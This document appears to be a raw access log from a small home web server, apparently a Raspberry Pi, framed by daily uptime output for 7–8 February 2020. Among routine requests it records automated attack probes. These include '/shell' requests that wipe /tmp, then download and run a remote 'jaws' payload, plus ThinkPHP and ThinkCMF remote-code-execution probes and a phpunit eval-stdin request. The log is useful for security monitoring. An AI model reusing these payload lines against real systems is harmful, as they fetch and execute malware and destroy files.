Fri Feb  7 06:25:06 MST 2020
 06:25:06 up 6 days, 18:28,  1 user,  load average: 0.47, 0.30, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               31Jan20  6days  5:10   1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE
79.79.7.250 - - [07/Feb/2020:14:10:14 +0000] "GET / HTTP/1.1" 400 0 "" ""
103.135.39.56 - - [07/Feb/2020:14:19:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
134.249.158.18 - - [07/Feb/2020:16:00:56 +0000] "GET / HTTP/1.1" 400 0 "" ""
157.119.227.115 - - [07/Feb/2020:16:32:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
5.101.0.209 - - [07/Feb/2020:18:16:48 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [07/Feb/2020:18:16:48 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [07/Feb/2020:18:16:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [07/Feb/2020:18:16:48 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.52.40.182 - - [07/Feb/2020:18:49:53 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world"
1.52.40.182 - - [07/Feb/2020:18:49:54 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
54.72.11.83 - - [07/Feb/2020:20:33:56 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world"
54.72.11.83 - - [07/Feb/2020:20:33:56 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
63.143.35.226 - - [07/Feb/2020:20:55:58 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
63.143.35.226 - - [07/Feb/2020:20:55:58 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
179.99.196.171 - - [07/Feb/2020:21:08:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.203.210.224 - - [07/Feb/2020:21:15:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
62.210.169.121 - - [07/Feb/2020:21:29:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Go-http-client/1.1"
65.48.168.46 - - [07/Feb/2020:21:50:57 +0000] "GET / HTTP/1.1" 400 0 "" ""
75.33.64.24 - - [07/Feb/2020:22:16:38 +0000] "GET / HTTP/1.1" 400 0 "" ""
185.219.219.123 - - [07/Feb/2020:22:27:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
191.255.193.199 - - [07/Feb/2020:22:55:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
128.14.134.170 - - [07/Feb/2020:22:58:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
5.101.0.209 - - [07/Feb/2020:23:04:03 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
87.241.134.220 - - [07/Feb/2020:23:46:02 +0000] "GET / HTTP/1.1" 400 0 "" ""
89.144.153.111 - - [08/Feb/2020:00:33:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
125.162.64.100 - - [08/Feb/2020:02:07:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.139.56.140 - - [08/Feb/2020:02:08:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
151.95.33.164 - - [08/Feb/2020:03:45:41 +0000] "GET / HTTP/1.1" 400 0 "" ""
68.56.175.231 - - [08/Feb/2020:03:55:16 +0000] "GET / HTTP/1.1" 400 0 "" ""
212.69.18.199 - - [08/Feb/2020:05:15:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
46.38.235.14 - - [08/Feb/2020:06:16:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:16:52 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:04 +0000] "GET /ac0xl/www/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:10 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:21 +0000] "GET /readme.txt HTTP/1.1" 200 247 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:27 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:34 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 6.0; Mobile; rv:68.0) Gecko/20100101 Firefox/68.0"
46.38.235.14 - - [08/Feb/2020:06:17:44 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
89.251.67.166 - - [08/Feb/2020:06:43:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.148.10.179 - - [08/Feb/2020:07:53:22 +0000] "GET / HTTP/1.0" 200 25000 "" ""
171.249.52.168 - - [08/Feb/2020:08:22:20 +0000] "GET / HTTP/1.1" 400 0 "" ""
34.215.137.189 - - [08/Feb/2020:10:11:56 +0000] "UNKNOWN  HTTP/1.1" 501 0 "" ""
94.1.83.22 - - [08/Feb/2020:12:08:56 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
192.241.238.169 - - [08/Feb/2020:12:13:31 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
42.117.57.41 - - [08/Feb/2020:12:28:33 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world"
42.117.57.41 - - [08/Feb/2020:12:28:34 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
46.38.97.6 - - [08/Feb/2020:12:46:09 +0000] "GET / HTTP/1.1" 400 0 "" ""
114.177.42.202 - - [08/Feb/2020:12:49:13 +0000] "GET / HTTP/1.1" 400 0 "" ""
5.101.0.209 - - [08/Feb/2020:13:18:00 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [08/Feb/2020:13:18:08 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [08/Feb/2020:13:18:09 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [08/Feb/2020:13:18:14 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
Sat Feb  8 06:25:07 MST 2020
 06:25:07 up 7 days, 18:28,  1 user,  load average: 0.63, 0.34, 0.38
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               31Jan20  7days  5:44   1.12s /usr/bin/lxsession -s LXDE-pi -e LXDE